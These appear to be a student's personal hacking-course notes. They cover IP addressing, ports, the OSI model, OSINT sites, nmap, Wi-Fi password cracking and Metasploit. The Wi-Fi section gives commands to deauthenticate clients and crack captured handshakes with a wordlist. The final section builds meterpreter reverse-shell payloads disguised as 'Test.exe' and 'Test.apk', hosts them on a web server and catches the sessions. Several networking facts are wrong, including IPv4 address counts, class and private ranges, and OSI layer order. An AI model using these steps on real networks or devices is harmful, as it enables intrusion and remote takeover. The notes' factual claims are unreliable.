#Networking (1/Aug)...

It is defined as a connection between 2 or more devices which are use to share data
.

Types:LAN ,WLAN,CAN,MAN,WAN,PAN..

IP:It is an unique id of our devices or host.

Type: IPv4 and Ipv6

IPv4--
1981.
32 bit Ip
4.3 millions addresses
Numeric.decimal Notation (192.168.1.1)
Range 0-255.

IPv6--
1998
128 bit IP
7.3*10 raised to 28 IP addreses
Aplhanumeric hexadecimal notation (2001:db8:3333:4444:5555:6666:7777:8888.)
Range 0-9 and A-F.

Classes
A:0-126 (used by organisations)
B:128-191 (used by MNC)
C:191-223 (Most common IPs)
D:224-239 (Goevernment registered IPs)
E:240-255 (used for Experiments)

Special IPs:
127.0.0.1 --Loopback or LocalHost Ip
169.0.0.1 --APIPA(Automatic Pvt IP Addresses)
255.0.0.1 --Broadcasting Ips

Private IPs:
A:10.0.0.1
B:178.16.1.1 To 178.32.1.1
C:192.168.1.1

-----------------------------------------------------------------------------------
----

#Ports (2/Aug)

Total Ports: 65535 ports

Registered Ports: 1024

Port State:
Open
close
Filtered(Specific)

Basic Ports
20-21:FTP File Transfer Protocol
22:SSH Secure Shell (Requires authentication)
23:Telnet Telytype Network
25:SMTP Simple mail transfer Pro
 53:DNS Domain Name Systen (Used to link Domain and Domain Name to Ips)
67,68:DHCP Dynamic Host Config Pro (Provide IPs to newly Connected devices)
80:HTTP To host website (Plain Text )
110:POP3 Post Office Protocol
123:NTP N/W Transfer Pro
135-139: NetBios Name Service
143:IMAP4 Internet Msg acces pro
161-162:SNMP Simple N/W Management pro
389:LDAP Lightweight Dir Authentication Pro
443:HTTPs (Secured) {Uses SSL Secure Socket layer and TLS transport Layer
Secure to
encrypt DATA.}
445:Microsoft -DS (Active Directory) /////SMB (system Management Block)
2049:NFS N/W File sys
3389:RDP Remote Desktop Pro
5900:VNC Virtual N/W controller
4444 & 8080: Dynamic Port

-----------------------------------------------------------------------------------
----

#TCP

TCP Flags
SYN:Synchronise
ACK:Acknowledgement
FIN:Finish
RST:Reset
PSH:Push
URG:Urgent

#OSI Open Sys InterConnection (7layers)

1.Application
2.Presentation
3.Session
4.Transport
5.Network
6.Data Link
7.Physical

-----------------------------------------------------------------------------------
----

#Info Gathering

**Websites**
1.Netcraft
2.Wayback Machine
3.DNS Dumpster
4.Virus Total
5.WhoIs
6.Urlscan.io
7.Shodan (Info About Present Devices)

**Extensions**
1.Wapplyzer
2.FlagFox
3.W3Tech
**IP Info**
Grabify
IP2Location
Google Maps

OSINT Framework

-----------------------------------------------------------------------------------
---

#N/W Scanning

Script Loc: /usr/share/nmap/scripts

Nmap Full N/W scan

namp -Pn -sV -O IP

-----------------------------------------------------------------------------------
---

#Enumeration

Def:
The proc of extracting user names, machines name ,N/W resource ,shared and
services from a sys.

-----------------------------------------------------------------------------------
---

#WIFI Hacking

WAP: Wireless access pro

Tools:
aircrack-ng
aireplay-ng
airodump-ng

Types of password cracking

1.Prediction
2.Dictionary (Wordlist)
3.Hash Method

Wordlist:
cd /usr/share/wordlists/

#to unzip the .gz file -- use gunzip (Filename)

Commands:

$ifconfig

$airodump-ng wlan0

$airodump-ng -c1 --bssid (MAC Add) -w Ethas (Filename) wlan0 ------

Handshake
 $aireplay-ng -deauth 05 -a (MAC Add) wlan0 -------To Disconnect

$aircrack-ng Ethas-01.cap (Filename) ------To chcek Handshake

$aircrack-ng -w rockyou.txt (Wordlist) Ethas-01.cap ---To check the

password.

#Hashed Method: (USE JOHN2 tool)

$aircrack-ng .cap (cap file) -j newfilename

$hccap2john newfilename.hccap > New.txt

----------------------------------------------------------------------------------
#Vulnerability Assesement

3Term:
CVE: Common vulnerability Exposure
CVSS: Common Vulnerability scoring system
CWE: Common Weakness Assesement

Toools Used:
Nessus Tenable (to find vulnerability and CVSS)

Websites :
CVE details
Rapid7
ExploitDB

----------------------------------------------------------------------------------
#Metasploit Framework

7 Module Of MF
1.Exploit :2315
2.Payloads :975
3.Auxiliary :1208
4.Post :412
5.Encoders :46
6.NOPs (NO Operation) :11
7.Evasion :9

Steps To use MF

$msfconsole (use to start MF)

$show (it is used to show exploits,payloads,aux,post,etc)
$serach (to search CVSS)
$use (it is use to setup exploit)
$set (to set exploit,payload,etc)

Steps to check and set requiredments

$options (to view req)

$set RHOSTS
$set LHOST
To use or run

$exploit (this cmd is used)

$info (info about exploit)

----------------------------------------------------------------------------------
#GAINING ACCESS & CREATING VENOM

1.Windows 10

Create venom at this location:- cd /var/www/html/

steps:
1.Create a VENOM
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Local IP) PORT=4444 -f
exe -o Test.exe
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload windows/meterpreter/reverse_tcp

To check sessions
$sessions
$sessions -i (session no)

**************************************************
2.Android

Create a venom

steps:
1.Create a VENOM
$msfvenom -p android/meterpreter/reverse_tcp LHOST=(Local IP) PORT=8080 -o
Test.apk
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload android/meterpreter/reverse_tcp